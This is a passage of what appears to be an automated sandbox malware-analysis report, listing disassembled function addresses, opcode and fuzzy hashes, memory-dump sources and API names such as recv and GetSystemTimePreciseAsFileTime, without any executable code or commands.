                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 782971cf22acf918bb2b4d24a8a83b8bb4af0d5e2f15e0b5d360e06cc86faafa
                                                                                                                                                                                                                                          • Instruction ID: 5f2e47ae788e84587da667980b7aa61a5d1d11215ebe5c78a8deb3dc14a83270
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 782971cf22acf918bb2b4d24a8a83b8bb4af0d5e2f15e0b5d360e06cc86faafa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C601F5F728CA15FE66C6A5C21B516F67A7AA597730370C02EF00BD5002F19117557AB2
                                                                                                                                                                                                                                          Function 04AC0757 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9897e90b177ba6f98d737df487598df1f18835182af588581546a63724fa691b
                                                                                                                                                                                                                                          • Instruction ID: 3c7a6da468fe76622ab180760189ff356360cfbdfdee9e86be0f7f5027def333
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9897e90b177ba6f98d737df487598df1f18835182af588581546a63724fa691b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CF0B4FB38CA14FD25CAA5C217A15B63F76E6A7730770C02EF14BC5102B1A067517AE2
                                                                                                                                                                                                                                          Function 04AC0763 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fdcbfecbb83ceb102b7b691136224e9e4df946a7a5135f8014fe3573df26f936
                                                                                                                                                                                                                                          • Instruction ID: 1c71ea0a82181b9d56af7d7caf786046d53be1899bd1131b406bdb8e1f745174
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdcbfecbb83ceb102b7b691136224e9e4df946a7a5135f8014fe3573df26f936
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37F024F738CA24ED25CAAAC216A05B67A35A6A6730371C12EF087D0002B55067517AB2
                                                                                                                                                                                                                                          Function 04AC0779 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e6ec260ba31a1075c11f77cc731621e0a6a7fed23e4afa91c9a42829b6339ab3
                                                                                                                                                                                                                                          • Instruction ID: 62cf0adcc922243deb660d72015e5e401ca177a119b5895bf6583d430f8eb8f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6ec260ba31a1075c11f77cc731621e0a6a7fed23e4afa91c9a42829b6339ab3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FF050F734CA14DE61C591D22AA12B57775A7A6B30370C02DF44BC2142B4A4265276B3
                                                                                                                                                                                                                                          Function 04AC07F8 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 17a5e21516b769333fc5dc026786344f6b8d408ce2439de879fc14d1e68f4ca7
                                                                                                                                                                                                                                          • Instruction ID: 32935ee9b18b822e6757bf64a74f4e10af593c186a53ae9b893bc035f6438005
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17a5e21516b769333fc5dc026786344f6b8d408ce2439de879fc14d1e68f4ca7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F0E9F738DA51DD15C9A1D227506B57F74A593730371C01FE047C4502F154629676E2
                                                                                                                                                                                                                                          Function 04AC0797 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 96ec9b90d7b7ce79429e8cec8e7ec5ac3cfbe4e4532ca0a6698516becf559230
                                                                                                                                                                                                                                          • Instruction ID: 8dc78e63750745bbfa07120c682e6a2c49ab9bcc5e07cbbaec9182eaf841a215
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96ec9b90d7b7ce79429e8cec8e7ec5ac3cfbe4e4532ca0a6698516becf559230
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F02BF738CA25ED21C9A1D216606767A78A5A7730372C02FF047D5042B454265536F3
                                                                                                                                                                                                                                          Function 04AC07BE Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 47ef2ca36f87bda86afd8f33acee8bcf79ebb78b4ff15d8034ccda6c4d76a0ba
                                                                                                                                                                                                                                          • Instruction ID: a293a49340b1154a0cdccffbad52d5f7ccaaaaf2e6ba5949129bb737251348b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47ef2ca36f87bda86afd8f33acee8bcf79ebb78b4ff15d8034ccda6c4d76a0ba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2E068F734C260EE21C292D316606B63B74B5A3330370C06EF087C0001B014174677F2
                                                                                                                                                                                                                                          Function 04AC07B6 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b96459c62ad6f98ede7ab16756f31e4d91248e8841322615e7421588bea54ecc
                                                                                                                                                                                                                                          • Instruction ID: b9857f3194f0f6baedd7671b03681f70dd0e20a201c4bf338f1f68a332c46a96
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b96459c62ad6f98ede7ab16756f31e4d91248e8841322615e7421588bea54ecc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0E0DFFB38CA24ED21C5A1D22A64A767AB4B6A37303B1C06EF087C0042B554279676F2
                                                                                                                                                                                                                                          Function 04AC07D1 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 878374a7240f354023d98661bbc0140ff71763f19fb01486e90ed066cdf3c05f
                                                                                                                                                                                                                                          • Instruction ID: 49e4073629a03e5432f590d0e89e967e557b0f690081ebc8041b8dec9c87d598
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 878374a7240f354023d98661bbc0140ff71763f19fb01486e90ed066cdf3c05f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28E0227A10C261EED2C291E215556767FB0AB93730B21C0AFB0C380082E458076BB3E3
                                                                                                                                                                                                                                          Function 04AC0819 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f83d9b99e0720810b17b72ba84b3dd7ff389cdb8ebcaa6e284b09a65317412bb
                                                                                                                                                                                                                                          • Instruction ID: a5bc30d233adc4a823a3a670feaef63fb6444b8d0f23a2fe8640171bc2df0ab0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f83d9b99e0720810b17b72ba84b3dd7ff389cdb8ebcaa6e284b09a65317412bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68E0D8F725C154DD56C6A5E225601B53BB19697331771C16FA0C7C1046B4202256A7E6
                                                                                                                                                                                                                                          Function 04AC07A4 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9beb22e124d58e4d06f263889298c5da49c1d724cac68f803ccfd85b05b99a2d
                                                                                                                                                                                                                                          • Instruction ID: 7319781731a75d9e287cb8d1f00bbd2cc62dd4f81677701091848cd9f49155b1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9beb22e124d58e4d06f263889298c5da49c1d724cac68f803ccfd85b05b99a2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDE0D8BB24C914DE52C1D6C255505367AB0F796720760C09EF0D3C6040F5281661B7E3

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 0026E0C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • recv.WS2_32(?,?,00000004,00000000), ref: 0026E10B
                                                                                                                                                                                                                                          • recv.WS2_32(?,?,00000008,00000000), ref: 0026E140
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: recv
                                                                                                                                                                                                                                          • String ID: c13L
                                                                                                                                                                                                                                          • API String ID: 1507349165-2793365725
                                                                                                                                                                                                                                          • Opcode ID: 0336b5b429e345ccdbea76f620a6df338f42577d8afe955785606ffbc428ce42
                                                                                                                                                                                                                                          • Instruction ID: 31513b382bc740353f3d53b1cf563cca291725b609a1267373d2030378cbef10
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0336b5b429e345ccdbea76f620a6df338f42577d8afe955785606ffbc428ce42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1331E771A102589BDB20CB68DC89FAB77BCEB09724F514625E914E72D1CA74AC948BA0
                                                                                                                                                                                                                                          Function 0027CBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemTimePreciseAsFileTime.KERNEL32(?,0027CF52,?,00000003,00000003,?,0027CF87,?,?,?,00000003,00000003,?,0027C4FD,00262FB9,00000001), ref: 0027CC03
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$FilePreciseSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1802150274-0
                                                                                                                                                                                                                                          • Opcode ID: 0ce4fd0fe6df2646e4f566fb28189be470dc13732ad841fdbfff824a7987aa68
                                                                                                                                                                                                                                          • Instruction ID: 4cdc1e693310c1be7df93d00f5022166925ad0aaeb135f0dfe457a1942c0f6b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ce4fd0fe6df2646e4f566fb28189be470dc13732ad841fdbfff824a7987aa68
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AD02232512138A38A232BA4FC088ADBB4C8F04B24300411AED0C13220CA60BCD04BD0
                                                                                                                                                                                                                                          Function 00264B30 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
